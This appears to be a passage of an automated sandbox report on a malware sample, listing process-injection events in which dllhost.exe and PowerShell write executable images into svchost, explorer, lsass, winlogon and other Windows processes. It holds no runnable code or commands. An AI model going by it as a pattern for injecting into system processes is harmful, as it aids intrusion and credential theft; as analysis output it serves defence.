                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2101D0E0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\explorer.exe base: 8660000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 192D1E50000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26DD2000000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 257155B0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dasHost.exe base: 16443E50000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2C8A6F80000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1E968250000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A9452E0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 29227D20000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 283E5C00000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\smartscreen.exe base: 14BB07C0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22C4F660000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1DBAE500000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 27B1B9F0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 27FF3CD0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 281CF7C0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 28843650000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1DAE1050000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 37B0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 2D49ABF0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1C8D4DC0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 15E7EC90000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: DA0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 15D0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 1370000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 2E50000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 7A0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: BF0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 13F0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 2CF0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 14C0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 2F40000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 11E0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 2A10000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 2580000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 2DD0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 2D60000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 8D0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: C20000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 1190000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: BF0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: CA0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: C30000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 22B0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: E70000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: BF0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: BF0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: B90000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 1100000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 980000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 900000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 1140000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 1020000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: D70000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 590000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 810000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: E70000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 770000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: DA0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: B80000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 25C0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 1260000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: CE0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: E70000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 610000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 840000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 1220000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: D70000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 910000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 7A0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: A10000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 13B0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: D80000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: C30000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 9C0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 1000000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: DD0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 3040000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: BA0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: F00000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: CA0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 13D0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: B90000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 1220000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: C20000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 2D30000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 760000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 2D70000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 670000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 12A0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 13E0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 13D0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: DA0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 390000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 430000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 2240000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 3120000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: F00000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: FA0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 2A60000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 1470000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: D00000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 810000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: F00000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Users\Public\DeadXClient.exe base: 1C560000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 209CDA00000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 17C9A4B0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D056260000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 1EC87A30000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Users\Public\Deadsvchost.exe base: 1120000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Users\Public\Deadsvchost.exe base: 11C0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: PID: 4004 base: 8660000 value: 4D
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 5644
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140001000
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140004000
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140006000
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140007000
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 4DFBE7A010
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 2D016580000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 2D6F14E0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 14E41FA0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 1D15B080000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23AF32B0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23C9FD60000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A1CA6E0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 246ED7B0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 200A1980000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22595FB0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22E670C0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1FE4A4B0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 24C19A40000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 275D1FC0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23BBDC90000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 227D8FC0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2DED2C70000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 14ACE6B0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 220AEFD0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 241B6940000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 202A22A0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 14D25AA0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1BD1A2F0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21A63950000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1834ABA0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2D8F03D0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 18BAF3C0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 256EBEB0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2568E1B0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 226A7DC0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\spoolsv.exe base: 12A0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1E2C0F50000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2EE0D7C0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22B68FC0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 207EA5D0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 1EBCE9B0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 11CD5BB0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1AFDEB70000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 207C0460000
